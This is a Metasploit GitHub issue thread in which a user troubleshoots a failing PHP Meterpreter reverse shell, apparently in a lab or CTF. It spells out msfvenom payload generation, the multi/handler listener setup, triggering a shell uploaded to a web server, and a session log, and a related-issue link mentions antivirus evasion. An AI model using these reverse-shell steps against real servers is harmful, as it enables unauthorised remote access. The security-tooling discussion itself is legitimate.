Metasploit-framework: PHP Reverse Shell is not working

Created on 14 Sep 2017 · 8Comments · Source: rapid7/metasploit-framework

Steps to reproduce

How'd you do it?

First, creating the backdoor with msfvenom outside of metasploit

root@5433584:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell5.PHP
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30067 bytes

Starting the listener

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.14.11.92
lhost => 10.14.11.92
msf exploit(handler) > set lport 4449
lport => 4449
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.14.11.92      yes       The listen address
   LPORT  4449             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.14.11.92:4449

netstat -an |grep 444 shows:

root@5433584:~# netstat -an |grep 444
tcp        0      0 10.14.11.92:4449        0.0.0.0:*               LISTEN

Therefore, everythings is fine.

Calling the PHP script directly in Browser to trigger:
http://10.14.11.150/admin/uploads/shell5.PHP

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

Expected behavior

Shell should come up

Current behavior

Error message comes up
Parse error: syntax error, unexpected '[' in /var/www/admin/uploads/shell5.PHP on line 1

I've looked at the source of the shell and saw this:
/*/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) { $GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) { $GLOBALS['resource_type_map'] = array(); } if (!isset($GLOBALS['udp_host_map'])) { $GLOBALS['udp_host_map'] = array(); } if (!isset($GLOBALS[

Question:
this should be without the /* comment, right?
Even when removing it, behavior is the same. the
Source is attached as txt-file.

System stuff

Metasploit version

Framework: 4.16.6-dev
Console : 4.16.6-dev

I installed Metasploit with:

[X ] Kali package via apt

[ ] Omnibus installer (nightly)

[ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)

[ ] Source install (please specify ruby version)

OS

Linux 54784584 4.12.0-kali1-amd64 #1 SMP Debian 4.12.6-1kali1 (2017-08-18) x86_64 GNU/Linux

thanks fo rchecking

bug payload
Source

ghost

Most helpful comment

wrong payload (php/meterpreter/reverse_tcp), set (php/meterpreter_reverse_tcp)

Gilpw on 9 Oct 2018

👍2

All 8 comments

Nicely explained

AlistairXX on 15 Sep 2017

The comment shouldn't matter, and there is no need to close the opening <?php, the issue is elsewhere :/

jvoisin on 18 Sep 2017

Hello @DontFuckItUp, I believe the issue is because you used the payload php/meterpreter_reverse_tcp with msfvenom (unstaged payload), but specified the staged version php/meterpreter/reverse_tcp in msfconsole.

Notice that one has a _ between meterpreter and reverse while the other has a /…

Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?

Rogdham on 22 Sep 2017

👍2

Hello,
i tested your recommendation with no luck. to be more detailed: i followed your directions:
Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?

and as the result, the session dies
my full log:

root@klappse:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell6.PHP No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1112 bytes root@klappse:~# msfconsole Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... > access security access: PERMISSION DENIED. > access security grid access: PERMISSION DENIED. > access main security grid access: PERMISSION DENIED....and... YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! =[ metasploit v4.16.9-dev ] + -- --=[ 1687 exploits - 966 auxiliary - 299 post ] + -- --=[ 498 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler msf exploit(handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 10.14.11.92 LHOST => 10.14.11.92 msf exploit(handler) > set LPORT 4449 LPORT => 4449 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.14.11.92 yes The listen address LPORT 4449 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.14.11.92:4449 msf exploit(handler) > [*] Sending stage (37514 bytes) to 10.14.11.91 [*] Meterpreter session 1 opened (10.14.11.92:4449 -> 10.14.11.91:45139) at 2017-10-09 12:44:22 +0200 [*] 10.14.11.91 - Meterpreter session 1 closed. Reason: Died

ghost on 9 Oct 2017

I might be having a similar issue if not the same one!

kawaxi on 22 Oct 2017

I'm seeing similar in v4.16.13-dev. Tcpdump shows syn packets on attacker machine with no response. Is in ctf environment so cannot get files.

gaskinsus on 15 Jun 2018

@wvu-r7 seems there wasn't a stable connectiuon/something blocking it so it's probably not a valid bug.

fsacer on 29 Jul 2018

wrong payload (php/meterpreter/reverse_tcp), set (php/meterpreter_reverse_tcp)

Gilpw on 9 Oct 2018

👍2

Was this page helpful?

0 / 5 - 0 ratings

Related issues

How to evade Norton 360

Sonya2010 · 3Comments

Error while running command kill: undefined method `datastore' for "Error while running command kill: undefined method `datastore' for "IK3ioQdrzz1eFJ6p4tCJ21":String":String

idetest41 · 3Comments

Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass

miholtz · 3Comments

[ Metasploit Framework ]Loading External Modules

XSecr3t · 3Comments

Error while running command jobs: undefined method `ctx' for nil:NilClass

bcoles · 3Comments